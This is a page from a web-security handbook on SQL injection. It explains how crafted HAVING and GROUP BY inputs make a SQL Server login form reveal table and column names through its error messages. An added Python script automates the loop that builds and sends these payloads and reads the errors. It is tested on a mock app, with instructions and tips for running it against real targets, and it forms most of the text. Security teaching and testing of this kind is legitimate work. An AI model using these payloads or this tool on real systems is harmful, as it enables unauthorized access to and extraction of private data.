The Web Application Hacker’s Handbook Discovering and Exploiting Security Flaws




262    Chapter 9    Injecting Code




can be exploited in various ways. The techniques described here were first discovered by David Litchfield and Chris Anley in the course of a penetration test, and are described in detail in several whitepapers by them.

Enumerating Table and Column Names

Recall the login function described earlier, which performs the following SQL query, in which the username and password fields are vulnerable to SQL injection:

    SELECT * FROM users WHERE username = 'marcus' and password = 'secret'

Although you can bypass the login by injecting into either of these fields, if you wish to exploit the vulnerability to extract or modify sensitive data, then you will need to know the names of the table and columns involved. Suppose that the table being queried was originally created using the command

    create table users( ID int, username varchar(255), password varchar(255), privs int)

If ODBC error messages are being returned to your browser, then you can trivially obtain all of this information about the table. The first step is to inject the following string into one of the vulnerable fields:

    ' having 1=1--

This generates the following error message:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.ID' is
    invalid in the select list because it is not contained in an aggregate
    function and there is no GROUP BY clause.

Embedded in this error message is the item users.ID, which in fact discloses the name of the table being queried (users) and the name of the first column being returned by the query (ID). The next step is to insert the enumerated column name into the attack string, which produces this:

    ' group by users.ID having 1=1--

Submitting this value generates the following error message:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.username'
    is invalid in the select list because it is not contained in either an
    aggregate function or the GROUP BY clause.
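The procedure above is iterative: every round adds the column the server just complained about to the GROUP BY list and resubmits, until the server stops complaining, at which point every column has been named. The script below is an added example, not code from the book, that automates that loop and parses the SQL Server error text with a regular expression. Because a real SQL Server back end is not available offline, the HTTP request is replaced by a constructed mock (MockLoginApp) that builds the same query as the login function above and reproduces the two error messages quoted on this page for a users(ID, username, password, privs) table; the names MockLoginApp, send_payload and enumerate_columns are this example's own. To use it against a real application, replace the lambda passed to enumerate_columns with a function that submits the payload in the vulnerable field and returns the response body.

```python
import re
from typing import Callable, List, Optional, Tuple

# Matches "Column 'users.ID' is invalid in the select list ..." in both of the
# SQL Server message variants shown above (with and without a GROUP BY clause).
COLUMN_ERROR = re.compile(
    r"Column '(?P<table>[^'.]+)\.(?P<column>[^']+)' is invalid in the select list"
)


class MockLoginApp:
    """Constructed stand-in for the vulnerable login page (assumption: a SQL
    Server back end). It builds the page's query verbatim and emulates the
    server's GROUP BY / HAVING check: with HAVING present, the first selected
    column that is not in the GROUP BY list raises the error quoted above."""

    TABLE = "users"
    COLUMNS = ["ID", "username", "password", "privs"]

    def login(self, username: str, password: str) -> str:
        query = (f"SELECT * FROM {self.TABLE} WHERE username = '{username}' "
                 f"and password = '{password}'")
        return self._execute(query)

    def _execute(self, query: str) -> str:
        sql = query.split("--", 1)[0]  # "--" starts a T-SQL line comment
        m = re.search(r"\bgroup by\s+(.+?)\s+having\b", sql, re.IGNORECASE)
        has_group_by = m is not None
        grouped = set()
        if m:
            # Accept both "users.ID" and bare "ID" in the GROUP BY list.
            grouped = {c.strip().split(".")[-1].lower() for c in m.group(1).split(",")}
        elif not re.search(r"\bhaving\b", sql, re.IGNORECASE):
            return "Login failed"  # plain query, no aggregate error
        # SELECT * expands to every column; the first ungrouped one errors.
        for col in self.COLUMNS:
            if col.lower() not in grouped:
                tail = ("either an aggregate function or the GROUP BY clause"
                        if has_group_by else
                        "an aggregate function and there is no GROUP BY clause")
                return ("Microsoft OLE DB Provider for ODBC Drivers error '80040e14'\n"
                        "[Microsoft][ODBC SQL Server Driver][SQL Server]Column "
                        f"'{self.TABLE}.{col}' is invalid in the select list "
                        f"because it is not contained in {tail}.")
        return "Login failed"  # every column grouped: the query runs normally


def enumerate_columns(send_payload: Callable[[str], str],
                      max_columns: int = 64) -> Tuple[Optional[str], List[str]]:
    """Drive the HAVING / GROUP BY loop against a target.

    send_payload(payload) must submit `payload` in the vulnerable field and
    return the response body. Returns (table name, columns in select order).
    """
    table: Optional[str] = None
    columns: List[str] = []
    for _ in range(max_columns):
        if columns:
            group_list = ", ".join(f"{table}.{c}" for c in columns)
            payload = f"' group by {group_list} having 1=1--"
        else:
            payload = "' having 1=1--"
        m = COLUMN_ERROR.search(send_payload(payload))
        if m is None:
            break  # no complaint left: every column is now in the GROUP BY
        table = m.group("table")
        column = m.group("column")
        if column in columns:
            break  # server did not accept our GROUP BY; avoid looping forever
        columns.append(column)
    return table, columns


if __name__ == "__main__":
    app = MockLoginApp()
    table, cols = enumerate_columns(lambda p: app.login(p, "x"))
    print(f"table: {table}")
    print("columns:", ", ".join(cols))
```

Two practical caveats when pointing this at a real target: the error text may be wrapped or partially HTML-encoded by the application, so search the decoded body rather than the raw bytes, and the driver prefix ("[Microsoft][ODBC SQL Server Driver]") varies by driver version, which is why the regex anchors only on the "Column '...' is invalid in the select list" fragment that SQL Server itself produces.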

